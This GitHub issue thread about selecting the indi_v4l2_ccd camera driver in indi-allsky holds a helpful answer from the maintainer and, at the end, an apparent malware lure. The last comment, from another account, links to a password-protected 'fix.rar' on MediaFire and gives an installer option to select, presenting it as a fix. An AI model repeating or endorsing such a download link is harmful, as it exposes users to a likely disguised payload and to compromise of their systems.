### ISSUE TITLE
Where to select proper camera type for this camera?

### ISSUE THREAD

**Issue by aaronwmorris** [aaronwmorris/indi-allsky#1483]
Where to select proper camera type for this camera? i dont see indi_v4l2_ccd

_Originally posted by @blablazzz in https://github.com/aaronwmorris/indi-allsky/issues/1225#issuecomment-2312143934_

**Comment by aaronwmorris** [comment]
The indi_v4l2_ccd driver is selectable when you run setup.sh.  If you have already run setup.sh, you will need to select the option to reconfigure the indiserver.  `indi_v4l2_ccd` will be selectable among the rest of the indi camera drivers.

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
